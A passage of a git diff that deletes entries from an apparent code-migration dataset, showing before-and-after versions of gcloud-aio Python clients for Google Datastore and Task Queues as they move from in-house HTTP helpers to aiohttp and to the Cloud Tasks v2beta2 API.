skip_invalid=skip_invalid, - ignore_unknown=ignore_unknown) - payload = json.dumps(body).encode('utf-8') - - headers = await self.headers() - headers.update({ - 'Content-Length': str(len(payload)), - 'Content-Type': 'application/json' - }) - - async with aiohttp.ClientSession() as s: - response = await s.post(url, data=payload, headers=headers, - params=None, timeout=60) - content = await response.json() - - if 299 >= response.status >= 200 and 'insertErrors' not in content: - return True - - log.debug('response code: %d', response.status) - log.debug('url: %s', url) - log.debug('body:\n%s\n', payload) - - raise Exception('Could not insert: {}'.format( - json.dumps(content, sort_keys=True))) - - -async def stream_insert(table, rows): - - insert_rows = make_rows(rows) - result = await table.insert(insert_rows) - - return result - - -def make_stream_insert(project, service_file, dataset_name, table_name, - session=None): - - table = Table( - project, - service_file, - dataset_name, - table_name, - session=session - ) - - return functools.partial(stream_insert, table) diff --git a/v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.diff b/v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.diff deleted file mode 100644 index 5243fbc..0000000 --- a/v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.diff +++ /dev/null @@ -1,83 +0,0 @@ -diff --git a/datastore/gcloud/aio/datastore/datastore.py b/datastore/gcloud/aio/datastore/datastore.py - index a0dec8f2fbd615b39c7ba56ac2861262f4e38c6e..963f34706918757ab7d3cbad70c363b9a48b9d40 100644 - --- a/datastore/gcloud/aio/datastore/datastore.py - +++ b/datastore/gcloud/aio/datastore/datastore.py -@@ -1,11 +1,15 @@ - import datetime - import logging - -+import aiohttp - from gcloud.aio.auth import Token --from gcloud.aio.core.http import post - from gcloud.aio.datastore.constants import Mode - from gcloud.aio.datastore.constants import Operation - from gcloud.aio.datastore.constants import TypeName -+try: -+ import ujson as json -+except ModuleNotFoundError: -+ import json - - - API_ROOT = 'https://datastore.googleapis.com/v1/projects' -@@ -115,20 +119,23 @@ class Datastore(object): - async def transact(self): - 
url = '{}/{}:beginTransaction'.format(API_ROOT, self.project) - headers = await self.headers() -- body = {} -+ headers.update({ -+ 'Content-Length': '0', -+ 'Content-Type': 'application/json' -+ }) - -- status, content = await post(url, payload={}, headers=headers) -+ async with aiohttp.ClientSession() as s: -+ response = await s.post(url, data={}, headers=headers, params=None, -+ timeout=60) -+ content = await response.json() - - # TODO: make this raise_for_status-able. -- success = 299 >= status >= 200 -- -- if success: -+ if 299 >= response.status >= 200: - transaction = content['transaction'] - return transaction - -- log.debug('response code: %d', status) -+ log.debug('response code: %d', response.status) - log.debug('url: %s', url) -- log.debug('body:\n%s\n', body) - - raise Exception('Could not transact: {}'.format(content)) - -@@ -136,18 +143,24 @@ class Datastore(object): - url = '{}/{}:commit'.format(API_ROOT, self.project) - - body = make_commit_body(transaction, mode, mutations) -+ payload = json.dumps(body).encode('utf-8') - - headers = await self.headers() -+ headers.update({ -+ 'Content-Length': str(len(payload)), -+ 'Content-Type': 'application/json' -+ }) - -- status, content = await post(url, payload=body, headers=headers) -+ async with aiohttp.ClientSession() as s: -+ response = await s.post(url, data=payload, headers=headers, -+ params=None, timeout=60) -+ content = await response.json() - - # TODO: make this raise_for_status-able. -- success = 299 >= status >= 200 and 'insertErrors' not in content -- -- if success: -- return success -+ if 299 >= response.status >= 200 and 'insertErrors' not in content: -+ return True - -- raise Exception('{}: {} > {}'.format(status, url, content)) -+ raise Exception('{}: {} > {}'.format(response.status, url, content)) - - # TODO: look into deletion payload format - diff --git a/v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.source.py b/v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.source.py deleted file mode 100644 index 0a193c3..0000000 --- a/v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.source.py +++ /dev/null @@ -1,176 +0,0 @@ -import datetime -import logging - -from gcloud.aio.auth import Token -from gcloud.aio.core.http import post -from gcloud.aio.datastore.constants import Mode -from gcloud.aio.datastore.constants import Operation -from gcloud.aio.datastore.constants import TypeName - - -API_ROOT = 'https://datastore.googleapis.com/v1/projects' -SCOPES = [ - 'https://www.googleapis.com/auth/datastore', - 'https://www.googleapis.com/auth/cloud-platform', -] - -log = logging.getLogger(__name__) - - -def infer_type(value): - # TODO: support more than just scalars - type_name = { - bytes: TypeName.BLOB, - datetime.datetime: TypeName.TIMESTAMP, - float: TypeName.DOUBLE, - int: TypeName.INTEGER, - str: TypeName.STRING, - type(False): TypeName.BOOLEAN, - type(None): TypeName.NULL, - }.get(type(value)) - - if not type_name: - raise Exception('Type {} not supported for DS insert. 
:('.format( - type(value) - )) - - return type_name - - -def format_timestamp(dt): - # RFC3339 UTC "Zulu" format, accurate to nanoseconds - return dt.strftime('%Y-%m-%dT%H:%S:%M.%f000Z') - - -def format_value(type_name, value): - formatted_value = { - TypeName.TIMESTAMP: format_timestamp, - }.get(type_name, lambda v: v)(value) - - return formatted_value - - -def make_commit_body(transaction, mode=Mode.TRANSACTIONAL, mutations=None): - if not mutations: - raise Exception('At least one mutation record is required.') - - return { - 'mode': mode.value, - 'mutations': mutations, - 'transaction': transaction, - } - - -def make_mutation_record(operation, kind, name, properties, project): - props = make_properties(properties) - - mutation = { - operation.value: { - 'key': { - 'partitionId': { - 'projectId': project, - 'namespaceId': '', - }, - 'path': [ - { - 'kind': kind, - 'name': name, - }, - ], - }, - 'properties': props, - } - } - - return mutation - - -def make_properties(properties): - return {k: make_value(v) for k, v in properties.items()} - - -def make_value(value): - type_name = infer_type(value) - - return { - 'excludeFromIndexes': False, - type_name.value: format_value(type_name, value), - } - - -class Datastore(object): - def __init__(self, project, service_file, session=None, token=None): - self.project = project - self.session = session - self.token = token or Token(project, service_file, session=session, - scopes=SCOPES) - - async def headers(self): - token = await self.token.get() - - return { - 'Authorization': 'Bearer {}'.format(token), - } - - async def transact(self): - url = '{}/{}:beginTransaction'.format(API_ROOT, self.project) - headers = await self.headers() - body = {} - - status, content = await post(url, payload={}, headers=headers) - - # TODO: make this raise_for_status-able. - success = 299 >= status >= 200 - - if success: - transaction = content['transaction'] - return transaction - - log.debug('response code: %d', status) - log.debug('url: %s', url) - log.debug('body:\n%s\n', body) - - raise Exception('Could not transact: {}'.format(content)) - - async def commit(self, transaction, mutations, mode=Mode.TRANSACTIONAL): - url = '{}/{}:commit'.format(API_ROOT, self.project) - - body = make_commit_body(transaction, mode, mutations) - - headers = await self.headers() - - status, content = await post(url, payload=body, headers=headers) - - # TODO: make this raise_for_status-able. 
- success = 299 >= status >= 200 and 'insertErrors' not in content - - if success: - return success - - raise Exception('{}: {} > {}'.format(status, url, content)) - - # TODO: look into deletion payload format - - async def insert(self, kind, name, properties, session=None): - return await self.operate(Operation.INSERT, kind, name, properties, - session=session) - - async def update(self, kind, name, properties, session=None): - return await self.operate(Operation.UPDATE, kind, name, properties, - session=session) - - async def upsert(self, kind, name, properties, session=None): - return await self.operate(Operation.UPSERT, kind, name, properties, - session=session) - - async def operate(self, operation, kind, name, properties, session=None): - # pylint: disable=too-many-arguments - # TODO: tune pylint argument limits - transaction = await self.transact() - - session = session or self.session - - mutation = make_mutation_record(operation, kind, name, properties, - self.project) - - return await self.commit(transaction, mutations=[mutation]) diff --git a/v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.target.py b/v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.target.py deleted file mode 100644 index daf5e50..0000000 --- a/v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.target.py +++ /dev/null @@ -1,189 +0,0 @@ -import datetime -import logging - -import aiohttp -from gcloud.aio.auth import Token -from gcloud.aio.datastore.constants import Mode -from gcloud.aio.datastore.constants import Operation -from gcloud.aio.datastore.constants import TypeName -try: - import ujson as json -except ModuleNotFoundError: - import json - - -API_ROOT = 'https://datastore.googleapis.com/v1/projects' -SCOPES = [ - 'https://www.googleapis.com/auth/datastore', - 'https://www.googleapis.com/auth/cloud-platform', -] - -log = logging.getLogger(__name__) - - -def infer_type(value): - # TODO: support more than just scalars - type_name = { - bytes: TypeName.BLOB, - datetime.datetime: TypeName.TIMESTAMP, - float: TypeName.DOUBLE, - int: TypeName.INTEGER, - str: TypeName.STRING, - type(False): TypeName.BOOLEAN, - type(None): TypeName.NULL, - }.get(type(value)) - - if not type_name: - raise Exception('Type {} not supported for DS insert. 
:('.format( - type(value) - )) - - return type_name - - -def format_timestamp(dt): - # RFC3339 UTC "Zulu" format, accurate to nanoseconds - return dt.strftime('%Y-%m-%dT%H:%S:%M.%f000Z') - - -def format_value(type_name, value): - formatted_value = { - TypeName.TIMESTAMP: format_timestamp, - }.get(type_name, lambda v: v)(value) - - return formatted_value - - -def make_commit_body(transaction, mode=Mode.TRANSACTIONAL, mutations=None): - if not mutations: - raise Exception('At least one mutation record is required.') - - return { - 'mode': mode.value, - 'mutations': mutations, - 'transaction': transaction, - } - - -def make_mutation_record(operation, kind, name, properties, project): - props = make_properties(properties) - - mutation = { - operation.value: { - 'key': { - 'partitionId': { - 'projectId': project, - 'namespaceId': '', - }, - 'path': [ - { - 'kind': kind, - 'name': name, - }, - ], - }, - 'properties': props, - } - } - - return mutation - - -def make_properties(properties): - return {k: make_value(v) for k, v in properties.items()} - - -def make_value(value): - type_name = infer_type(value) - - return { - 'excludeFromIndexes': False, - type_name.value: format_value(type_name, value), - } - - -class Datastore(object): - def __init__(self, project, service_file, session=None, token=None): - self.project = project - self.session = session - self.token = token or Token(project, service_file, session=session, - scopes=SCOPES) - - async def headers(self): - token = await self.token.get() - - return { - 'Authorization': 'Bearer {}'.format(token), - } - - async def transact(self): - url = '{}/{}:beginTransaction'.format(API_ROOT, self.project) - headers = await self.headers() - headers.update({ - 'Content-Length': '0', - 'Content-Type': 'application/json' - }) - - async with aiohttp.ClientSession() as s: - response = await s.post(url, data={}, headers=headers, params=None, - timeout=60) - content = await response.json() - - # TODO: make this raise_for_status-able. - if 299 >= response.status >= 200: - transaction = content['transaction'] - return transaction - - log.debug('response code: %d', response.status) - log.debug('url: %s', url) - - raise Exception('Could not transact: {}'.format(content)) - - async def commit(self, transaction, mutations, mode=Mode.TRANSACTIONAL): - url = '{}/{}:commit'.format(API_ROOT, self.project) - - body = make_commit_body(transaction, mode, mutations) - payload = json.dumps(body).encode('utf-8') - - headers = await self.headers() - headers.update({ - 'Content-Length': str(len(payload)), - 'Content-Type': 'application/json' - }) - - async with aiohttp.ClientSession() as s: - response = await s.post(url, data=payload, headers=headers, - params=None, timeout=60) - content = await response.json() - - # TODO: make this raise_for_status-able. 
- if 299 >= response.status >= 200 and 'insertErrors' not in content: - return True - - raise Exception('{}: {} > {}'.format(response.status, url, content)) - - # TODO: look into deletion payload format - - async def insert(self, kind, name, properties, session=None): - return await self.operate(Operation.INSERT, kind, name, properties, - session=session) - - async def update(self, kind, name, properties, session=None): - return await self.operate(Operation.UPDATE, kind, name, properties, - session=session) - - async def upsert(self, kind, name, properties, session=None): - return await self.operate(Operation.UPSERT, kind, name, properties, - session=session) - - async def operate(self, operation, kind, name, properties, session=None): - # pylint: disable=too-many-arguments - # TODO: tune pylint argument limits - transaction = await self.transact() - - session = session or self.session - - mutation = make_mutation_record(operation, kind, name, properties, - self.project) - - return await self.commit(transaction, mutations=[mutation]) diff --git a/v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.diff b/v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.diff deleted file mode 100644 index 4d7e51a..0000000 --- a/v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.diff +++ /dev/null @@ -1,502 +0,0 @@ -diff --git a/taskqueue/gcloud/aio/taskqueue/taskqueue.py b/taskqueue/gcloud/aio/taskqueue/taskqueue.py - index 811303e7ec900b3f4c50664f43f0f0cde8b5c06d..d15540f94ecdf468b1baf7fd9c025e4f862b3b69 100644 - --- a/taskqueue/gcloud/aio/taskqueue/taskqueue.py - +++ b/taskqueue/gcloud/aio/taskqueue/taskqueue.py -@@ -2,375 +2,148 @@ - An asynchronous queue for Google Appengine Task Queues - """ - import asyncio --import datetime --import json --import logging --import time - --import ujson -+import aiohttp - from gcloud.aio.auth import Token --from gcloud.aio.core.aio import call_later --from gcloud.aio.core.http import delete --from gcloud.aio.core.http import get --from gcloud.aio.core.http import HttpError --from gcloud.aio.core.http import patch --from gcloud.aio.core.http import post --from gcloud.aio.taskqueue.utils import encode - - --API_ROOT = 'https://www.googleapis.com/taskqueue/v1beta2/projects' -+API_ROOT = 'https://cloudtasks.googleapis.com/v2beta2' -+LOCATION = 'us-central1' - SCOPES = [ -- 'https://www.googleapis.com/auth/taskqueue', -- 'https://www.googleapis.com/auth/taskqueue.consumer', -- 'https://www.googleapis.com/auth/cloud-taskqueue', -- 'https://www.googleapis.com/auth/cloud-taskqueue.consumer', -+ 'https://www.googleapis.com/auth/cloud-tasks', - ] --TASK_QUEUE_URL = '{api_root}/s~{project_name}/taskqueues/{queue_name}/tasks' - --log = logging.getLogger(__name__) - -- --def make_insert_body(queue_name: str, payload: dict): -- -- delta = datetime.datetime.now() - datetime.datetime(1970, 1, 1) -- micro_sec_since_epock = int(delta.total_seconds() * 1000000) -- encoded_payload = encode(ujson.dumps(payload)) -- -- return { -- 'kind': 'taskqueues#task', -- 'queueName': queue_name, -- 'payloadBase64': encoded_payload, -- 'enqueueTimestamp': micro_sec_since_epock, -- 'leaseTimestamp': 0, -- 'retry_count': 0 -- } -- -- --def make_renew_body(queue_name: str, id_: str): -- -- return { -- 'kind': 'taskqueues#task', -- 'id': id_, -- 'queueName': queue_name -- } -- -- --class TaskQueue(object): -- -- """ -- An asynchronous Google Task Queue -- """ -- -- def __init__(self, project, 
service_file, task_queue, session=None, -- token=None): -+class TaskQueue: -+ def __init__(self, project, service_file, taskqueue, location=LOCATION, -+ session=None, token=None): - # pylint: disable=too-many-arguments -+ self.session = session or aiohttp.ClientSession() - -- self.task_queue = task_queue -- self.service_file = service_file -- self.session = session -- self.token = token or Token( -- project, -- self.service_file, -- session=self.session, -- scopes=SCOPES -- ) -- self.url = TASK_QUEUE_URL.format( -- api_root=API_ROOT, -- project_name=project, -- queue_name=task_queue -- ) -- -- async def insert_task(self, payload, tag='', session=None): -- -- session = session or self.session -- -- if tag: -- payload['tag'] = tag -- -- body = make_insert_body(self.task_queue, payload) -- -- token = await self.token.get() -- -- status, content = await post( -- self.url, -- payload=body, -- session=session, -- headers={ -- 'Authorization': 'Bearer {}'.format(token) -- } -- ) -- -- success = status >= 200 and status < 300 -- -- if not success: -- log.error('Could not insert task into %s: %s', self.task_queue, -- content) -- -- return success -- -- async def get_stats(self, session=None): -- -- """ -- get the task queue statistics -- """ -- -- session = session or self.session -- -- token = await self.token.get() -- -- status, content = await get( -- '/'.join(self.url.split('/')[:-1]), -- params={'getStats': 'true'}, -- headers={'Authorization': 'Bearer {}'.format(token)}, -- session=session -- ) -- -- if 200 <= status < 300: -- return content -+ self.api_root = '{}/projects/{}/locations/{}/queues/{}'.format( -+ API_ROOT, project, location, taskqueue) - -- raise HttpError('Could not get stats for {} -> {}: {}'.format( -- self.task_queue, -- status, -- content -- )) -+ self.token = token or Token(project, service_file, scopes=SCOPES, -+ session=self.session) - -- async def delete_task(self, id_, session=None): -- -- session = session or self.session -- -- token = await self.token.get() -- -- url = '{}/{}'.format(self.url, id_) -- -- status, phrase = await delete( -- url, -- headers={'Authorization': 'Bearer {}'.format(token)}, -- session=session -- ) -- -- if 200 <= status < 300: -- return True -- -- log.error('Error deleting task %s -> %s: %s', id_, status, phrase) -- -- async def lease_task(self, lease_seconds=60, num_tasks=1, tag=None, -- session=None): -- -- """ -- lease a task or tasks from the task queue -- """ -- -- session = session or self.session -+ async def headers(self): -+ return { -+ 'Authorization': 'Bearer {}'.format(await self.token.get()), -+ 'Content-Type': 'application/json', -+ } - -- token = await self.token.get() -+ # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/acknowledge -+ async def ack(self, task, session=None): -+ url = '{}/{}:acknowledge'.format(API_ROOT, task['name']) -+ body = { -+ 'scheduleTime': task['scheduleTime'], -+ } - -- url = '{}/{}'.format(self.url, 'lease') -+ s = session or self.session -+ resp = await s.post(url, json=body, headers=await self.headers()) -+ resp.raise_for_status() -+ return await resp.json() -+ -+ # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/cancelLease -+ async def cancel(self, task, session=None): -+ url = '{}/{}:cancelLease'.format(API_ROOT, task['name']) -+ body = { -+ 'scheduleTime': task['scheduleTime'], -+ 'responseView': 'BASIC', -+ } - -+ s = session or self.session -+ resp = await s.post(url, json=body, headers=await 
self.headers()) -+ resp.raise_for_status() -+ return await resp.json() -+ -+ # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/delete -+ async def delete(self, tname, session=None): -+ url = '{}/{}'.format(API_ROOT, tname) -+ -+ s = session or self.session -+ resp = await s.delete(url, headers=await self.headers()) -+ resp.raise_for_status() -+ return await resp.json() -+ -+ async def drain(self): -+ resp = await self.lease(num_tasks=1000) -+ while resp: -+ await asyncio.wait([self.delete(t['name']) for t in resp['tasks']]) -+ resp = await self.lease(num_tasks=1000) -+ -+ # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/get -+ async def get(self, tname, full=False, session=None): -+ url = '{}/{}'.format(API_ROOT, tname) - params = { -- 'alt': 'json', -- 'leaseSecs': lease_seconds, -- 'numTasks': num_tasks -+ 'responseView': 'FULL' if full else 'BASIC', - } - -- if tag: -- params.update({ -- 'groupByTag': 'true', -- 'tag': tag -- }) -- -- status, content = await post( -- url, -- headers={'Authorization': 'Bearer {}'.format(token)}, -- params=params, -- session=session -- ) -- -- if status < 200 or status >= 300: -- -- raise Exception('Could not lease a task from {} -> {}: {}'.format( -- self.task_queue, -- status, -- content -- )) -- -- items = content.get('items', []) -- -- return items[:num_tasks] -- -- async def renew_task(self, id_, lease_seconds=60, session=None): -- -- """ -- extend a task lease on the task queue -- """ -- -- session = session or self.session -- -- token = await self.token.get() -- -- url = '{}/{}'.format(self.url, id_) -- -- body = make_renew_body(self.task_queue, id_) -- -- status, phrase = await patch( -- url, -- payload=body, -- params={'alt': 'json', 'newLeaseSeconds': lease_seconds}, -- headers={'Authorization': 'Bearer {}'.format(token)}, -- session=session -- ) -- -- was_renewed = status == 200 -- -- if not was_renewed: -- log.error('Could not renew task %s in %s: %s', id_, -- self.task_queue, phrase) -- -- return was_renewed -- -- --class LocalTaskQueue(object): -- """ -- An asynchronous in-memory Task Queue -- """ -- # pylint: disable=too-many-instance-attributes -- def __init__(self, *args, **kwargs): # pylint: disable=unused-argument -- self.queue = asyncio.Queue() -- self.deleted = {} -- self.leased = {} -- self.ready = {} -- -- self.duration = 0 -- self.start_time = None -- -- self.on_empty = kwargs.get('on_empty') -- self.task_queue = kwargs.get('task_queue', 'q:{}'.format( -- self.next_id())) -- -- @classmethod -- def next_id(cls, name='tqid'): -- -- name = '_id_{}'.format(name) -- val = getattr(cls, name, 0) + 1 -- setattr(cls, name, val) -- -- return val -- -- @staticmethod -- def make_task(payload, retry_count=0): -- -- task = { -- 'id': LocalTaskQueue.next_id('tid'), -- 'retry_count': retry_count, -- 'payloadBase64': encode(json.dumps(payload).encode('utf-8')) -+ s = session or self.session -+ resp = await s.get(url, params=params, headers=await self.headers()) -+ resp.raise_for_status() -+ return await resp.json() -+ -+ # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/create -+ async def insert(self, payload, tag=None, session=None): -+ url = '{}/tasks'.format(self.api_root) -+ body = { -+ 'task': { -+ 'pullMessage': { -+ 'payload': payload, -+ 'tag': tag, -+ }, -+ }, -+ 'responseView': 'FULL', - } - -- return task -- -- async def _make_ready(self, task, bump=False): -- -- if bump: -- 
task['retry_count'] = task.get('retry_count', 0) + 1 -- -- self.ready[task['id']] = task -- -- await self.queue.put(task) -- -- async def _unlease(self, task): -- -- if task['id'] not in self.leased: -- return -- -- del self.leased[task['id']] -- -- await self._make_ready(task, bump=True) -- -- async def get_stats(self): -- -- return { -- 'qsize': self.queue.qsize(), -- 'ready': len(self.ready), -- 'leased': len(self.leased), -- 'deleted': len(self.deleted) -+ s = session or self.session -+ resp = await s.post(url, json=body, headers=await self.headers()) -+ resp.raise_for_status() -+ return await resp.json() -+ -+ # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/lease -+ async def lease(self, num_tasks=1, lease_seconds=60, task_filter=None, -+ session=None): -+ url = '{}/tasks:lease'.format(self.api_root) -+ body = { -+ 'maxTasks': min(num_tasks, 1000), -+ 'leaseDuration': '{}s'.format(lease_seconds), -+ 'responseView': 'FULL', -+ } -+ if task_filter: -+ body['filter'] = task_filter -+ -+ s = session or self.session -+ resp = await s.post(url, json=body, headers=await self.headers()) -+ resp.raise_for_status() -+ return await resp.json() -+ -+ # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/list -+ async def list(self, full=False, page_size=1000, page_token='', -+ session=None): -+ url = '{}/tasks'.format(self.api_root) -+ params = { -+ 'responseView': 'FULL' if full else 'BASIC', -+ 'pageSize': page_size, -+ 'pageToken': page_token, - } - -- async def insert_task(self, payload): -- -- task = LocalTaskQueue.make_task(payload) -- -- await self._make_ready(task) -- -- log.info('Inserted task.') -- -- async def delete_task(self, id_): -- -- if id_ in self.leased: -- del self.leased[id_] -- -- if id_ in self.ready: -- task = self.ready[id_] -- del self.ready[id_] -- self.deleted[id_] = task -- -- if self.on_empty: -- if not self.ready and not self.leased and not self.queue.qsize(): -- if self.start_time: -- self.duration = time.perf_counter() - self.start_time -- -- self.on_empty() -- return -- -- await asyncio.sleep(0) -- -- async def lease_task(self, lease_seconds=60, num_tasks=1): -- -- await asyncio.sleep(0) -- -- tasks = [] -- -- while len(tasks) < num_tasks: -- -- try: -- task = self.queue.get_nowait() -- except asyncio.QueueEmpty: -- break -- -- if not self.start_time: -- self.start_time = time.perf_counter() -- -- if task['id'] in self.deleted: -- del self.deleted[task['id']] -- continue -- -- del self.ready[task['id']] -- -- self.leased[task['id']] = ( -- call_later( -- lease_seconds, -- self._unlease, -- task -- ), -- task -- ) -- -- tasks.append(task) -- -- return tasks -- -- async def renew_task(self, id_, lease_seconds=60): -- -- if id_ not in self.leased: -- return False -- -- asyncio_task, task = self.leased[id_] -- asyncio_task.cancel() -- -- self.leased[id_] = ( -- call_later( -- lease_seconds, -- self._unlease, -- task -- ), -- task -- ) -+ s = session or self.session -+ resp = await s.get(url, params=params, headers=await self.headers()) -+ resp.raise_for_status() -+ return await resp.json() -+ -+ # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/renewLease -+ async def renew(self, task, lease_seconds=60, session=None): -+ url = '{}/{}:renewLease'.format(API_ROOT, task['name']) -+ body = { -+ 'scheduleTime': task['scheduleTime'], -+ 'leaseDuration': '{}s'.format(lease_seconds), -+ 'responseView': 'FULL', -+ } - -- return True 
-+ s = session or self.session -+ resp = await s.post(url, json=body, headers=await self.headers()) -+ resp.raise_for_status() -+ return await resp.json() diff --git a/v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.source.py b/v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.source.py deleted file mode 100644 index 05b3ee4..0000000 --- a/v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.source.py +++ /dev/null @@ -1,376 +0,0 @@ -""" -An asynchronous queue for Google Appengine Task Queues -""" -import asyncio -import datetime -import json -import logging -import time - -import ujson -from gcloud.aio.auth import Token -from gcloud.aio.core.aio import call_later -from gcloud.aio.core.http import delete -from gcloud.aio.core.http import get -from gcloud.aio.core.http import HttpError -from gcloud.aio.core.http import patch -from gcloud.aio.core.http import post -from gcloud.aio.taskqueue.utils import encode - - -API_ROOT = 'https://www.googleapis.com/taskqueue/v1beta2/projects' -SCOPES = [ - 'https://www.googleapis.com/auth/taskqueue', - 'https://www.googleapis.com/auth/taskqueue.consumer', - 'https://www.googleapis.com/auth/cloud-taskqueue', - 'https://www.googleapis.com/auth/cloud-taskqueue.consumer', -] -TASK_QUEUE_URL = '{api_root}/s~{project_name}/taskqueues/{queue_name}/tasks' - -log = logging.getLogger(__name__) - - -def make_insert_body(queue_name: str, payload: dict): - - delta = datetime.datetime.now() - datetime.datetime(1970, 1, 1) - micro_sec_since_epock = int(delta.total_seconds() * 1000000) - encoded_payload = encode(ujson.dumps(payload)) - - return { - 'kind': 'taskqueues#task', - 'queueName': queue_name, - 'payloadBase64': encoded_payload, - 'enqueueTimestamp': micro_sec_since_epock, - 'leaseTimestamp': 0, - 'retry_count': 0 - } - - -def make_renew_body(queue_name: str, id_: str): - - return { - 'kind': 'taskqueues#task', - 'id': id_, - 'queueName': queue_name - } - - -class TaskQueue(object): - - """ - An asynchronous Google Task Queue - """ - - def __init__(self, project, service_file, task_queue, session=None, - token=None): - # pylint: disable=too-many-arguments - - self.task_queue = task_queue - self.service_file = service_file - self.session = session - self.token = token or Token( - project, - self.service_file, - session=self.session, - scopes=SCOPES - ) - self.url = TASK_QUEUE_URL.format( - api_root=API_ROOT, - project_name=project, - queue_name=task_queue - ) - - async def insert_task(self, payload, tag='', session=None): - - session = session or self.session - - if tag: - payload['tag'] = tag - - body = make_insert_body(self.task_queue, payload) - - token = await self.token.get() - - status, content = await post( - self.url, - payload=body, - session=session, - headers={ - 'Authorization': 'Bearer {}'.format(token) - } - ) - - success = status >= 200 and status < 300 - - if not success: - log.error('Could not insert task into %s: %s', self.task_queue, - content) - - return success - - async def get_stats(self, session=None): - - """ - get the task queue statistics - """ - - session = session or self.session - - token = await self.token.get() - - status, content = await get( - '/'.join(self.url.split('/')[:-1]), - params={'getStats': 'true'}, - headers={'Authorization': 'Bearer {}'.format(token)}, - session=session - ) - - if 200 <= status < 300: - return content - - raise HttpError('Could not get stats for {} -> {}: {}'.format( - self.task_queue, 
- status, - content - )) - - async def delete_task(self, id_, session=None): - - session = session or self.session - - token = await self.token.get() - - url = '{}/{}'.format(self.url, id_) - - status, phrase = await delete( - url, - headers={'Authorization': 'Bearer {}'.format(token)}, - session=session - ) - - if 200 <= status < 300: - return True - - log.error('Error deleting task %s -> %s: %s', id_, status, phrase) - - async def lease_task(self, lease_seconds=60, num_tasks=1, tag=None, - session=None): - - """ - lease a task or tasks from the task queue - """ - - session = session or self.session - - token = await self.token.get() - - url = '{}/{}'.format(self.url, 'lease') - - params = { - 'alt': 'json', - 'leaseSecs': lease_seconds, - 'numTasks': num_tasks - } - - if tag: - params.update({ - 'groupByTag': 'true', - 'tag': tag - }) - - status, content = await post( - url, - headers={'Authorization': 'Bearer {}'.format(token)}, - params=params, - session=session - ) - - if status < 200 or status >= 300: - - raise Exception('Could not lease a task from {} -> {}: {}'.format( - self.task_queue, - status, - content - )) - - items = content.get('items', []) - - return items[:num_tasks] - - async def renew_task(self, id_, lease_seconds=60, session=None): - - """ - extend a task lease on the task queue - """ - - session = session or self.session - - token = await self.token.get() - - url = '{}/{}'.format(self.url, id_) - - body = make_renew_body(self.task_queue, id_) - - status, phrase = await patch( - url, - payload=body, - params={'alt': 'json', 'newLeaseSeconds': lease_seconds}, - headers={'Authorization': 'Bearer {}'.format(token)}, - session=session - ) - - was_renewed = status == 200 - - if not was_renewed: - log.error('Could not renew task %s in %s: %s', id_, - self.task_queue, phrase) - - return was_renewed - - -class LocalTaskQueue(object): - """ - An asynchronous in-memory Task Queue - """ - # pylint: disable=too-many-instance-attributes - def __init__(self, *args, **kwargs): # pylint: disable=unused-argument - self.queue = asyncio.Queue() - self.deleted = {} - self.leased = {} - self.ready = {} - - self.duration = 0 - self.start_time = None - - self.on_empty = kwargs.get('on_empty') - self.task_queue = kwargs.get('task_queue', 'q:{}'.format( - self.next_id())) - - @classmethod - def next_id(cls, name='tqid'): - - name = '_id_{}'.format(name) - val = getattr(cls, name, 0) + 1 - setattr(cls, name, val) - - return val - - @staticmethod - def make_task(payload, retry_count=0): - - task = { - 'id': LocalTaskQueue.next_id('tid'), - 'retry_count': retry_count, - 'payloadBase64': encode(json.dumps(payload).encode('utf-8')) - } - - return task - - async def _make_ready(self, task, bump=False): - - if bump: - task['retry_count'] = task.get('retry_count', 0) + 1 - - self.ready[task['id']] = task - - await self.queue.put(task) - - async def _unlease(self, task): - - if task['id'] not in self.leased: - return - - del self.leased[task['id']] - - await self._make_ready(task, bump=True) - - async def get_stats(self): - - return { - 'qsize': self.queue.qsize(), - 'ready': len(self.ready), - 'leased': len(self.leased), - 'deleted': len(self.deleted) - } - - async def insert_task(self, payload): - - task = LocalTaskQueue.make_task(payload) - - await self._make_ready(task) - - log.info('Inserted task.') - - async def delete_task(self, id_): - - if id_ in self.leased: - del self.leased[id_] - - if id_ in self.ready: - task = self.ready[id_] - del self.ready[id_] - self.deleted[id_] = task - - if 
